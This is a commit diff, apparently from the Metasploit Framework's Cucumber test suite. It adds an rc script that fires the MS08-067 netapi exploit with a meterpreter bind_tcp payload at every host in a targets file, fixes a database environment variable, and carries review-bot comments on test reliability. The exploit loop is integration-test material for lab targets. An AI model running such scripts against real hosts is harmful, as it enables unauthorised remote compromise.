Commit 3a254a9

This is a combination of 5 commits.
@db tests not working because the part where we tell it to connect to the database was commented out.

There was a race condition causing the rc script to exit before all of the sessions were opened. This change properly waits for us to get the expected number of sessions before exiting.

Use a more reliable form of the rc script.

Didn't mean to commit the schema.rb.

Forgot new line.
1 parent ee40c9d commit 3a254a9

2 files changed, +39 -13 lines changed

features/modules/exploit/smb/ms08_067_netapi.feature

Lines changed: 33 additions & 12 deletions
@@ -10,18 +10,39 @@ Feature: MS08-067 netapi
1010
Given I ready the windows targets
1111
Given a file named "ms08-067-bind.rc" with:
1212
"""
13-
<ruby>
14-
hosts = YAML.load File.open Rails.root.join('features', 'support', 'targets.yml')
15-
self.run_single('use exploit/windows/smb/ms08_067_netapi')
16-
self.run_single('set payload windows/meterpreter/bind_tcp')
17-
hosts.each do |host|
18-
self.run_single("set RHOST #{host['ipAddress']}")
19-
self.run_single('run -j')
20-
sleep 1
21-
end
22-
self.run_single('sessions -K')
23-
</ruby>
13+
<ruby>
14+
self.run_single("spool #{Rails.root.join('tmp', 'console.log')}")
15+
hosts = YAML.load File.open Rails.root.join('features', 'support', 'targets.yml')
16+
payload_name = 'windows/meterpreter/bind_tcp'
17+
exploited_hosts = []
18+
failed_hosts = []
19+
20+
hosts.each do |host|
21+
print_status("Trying MS08-067 against #{host['ipAddress']}")
22+
mod = framework.exploits.create('windows/smb/ms08_067_netapi')
23+
mod.datastore['PAYLOAD'] = payload_name
24+
mod.datastore['RHOST'] = host['ipAddress']
25+
m = mod.exploit_simple(
26+
'LocalInput' => nil,
27+
'LocalOutput' => nil,
28+
'Payload' => payload_name,
29+
'RunAsJob' => false
30+
)
31+
32+
sleep(1)
33+
34+
if m
35+
exploited_hosts << host['ipAddress']
36+
else
37+
failed_hosts << host['ipAddress']
38+
end
39+
end
40+
41+
print_status("Exploited hosts: #{exploited_hosts.inspect}")
42+
print_status("Failed hosts: #{failed_hosts.inspect}")
43+
self.run_single('sessions -K')
44+
</ruby>
2445
"""
25-
When I run `msfconsole --environment test -q -r ms08-067-bind.rc -x exit`
46+
When I successfully run `msfconsole --environment test -q -r ms08-067-bind.rc -x exit` for up to 100 seconds
2647
Then the 'Mdm::Host' table contains the expected targets
2748
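
Review bot: in the new loop (new lines 34-38 and 41-42) a host for which `exploit_simple` returns nil is only appended to `failed_hosts` and printed, so the rc script and the `msfconsole` step still finish normally and the scenario's result rests entirely on the `Mdm::Host` table check. Nothing visible in this hunk waits for or counts sessions, which is what the commit message describes; the only delay is the fixed `sleep(1)` at new line 32. Consider comparing the number of open sessions with `hosts.length` before `sessions -K`, and exposing a non-empty `failed_hosts` to a `Then` step, for example by asserting on the spooled `tmp/console.log`. Smaller points: `YAML.load File.open ...` never closes the file handle (`YAML.load_file` does), the spool started at new line 14 is never turned off, and the 100 second limit on the `When` step should be checked against the number of hosts in `targets.yml`, since hooks.rb sets `@aruba_timeout_seconds = 8.minutes`.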

features/support/hooks.rb

Lines changed: 6 additions & 1 deletion
@@ -1,9 +1,14 @@
11
Before do
2-
set_env('MSF_DATBASE_CONFIG', Rails.configuration.paths['config/database'].existent.first)
2+
set_env('MSF_DATABASE_CONFIG', Rails.configuration.paths['config/database'].existent.first)
33
set_env('RAILS_ENV', 'test')
44
@aruba_timeout_seconds = 8.minutes
55
end
66

7+
Before('@db') do |scenario|
8+
dbconfig = YAML::load(File.open(Metasploit::Framework::Database.configurations_pathname))
9+
ActiveRecord::Base.establish_connection(dbconfig["test"])
10+
end
11+
712
# don't setup child processes to load simplecov_setup.rb if simplecov isn't installed
813
# unless Bundler.settings.without.include?(:coverage)
914
# Before do |scenario|
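
Review bot: the `@db` hook at new lines 7-10 loads its settings from `Metasploit::Framework::Database.configurations_pathname`, while the `Before` hook above exports `MSF_DATABASE_CONFIG` from `Rails.configuration.paths['config/database'].existent.first`, so the cucumber process and the spawned msfconsole can end up reading different files if those two paths ever differ. Derive both from one source so the `Mdm::Host` assertions query the same database the console wrote to. Also, `dbconfig["test"]` is passed to `establish_connection` without checking that the key exists, the `File.open` handle is never closed (`YAML.load_file` avoids that), and the `scenario` block argument is unused.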
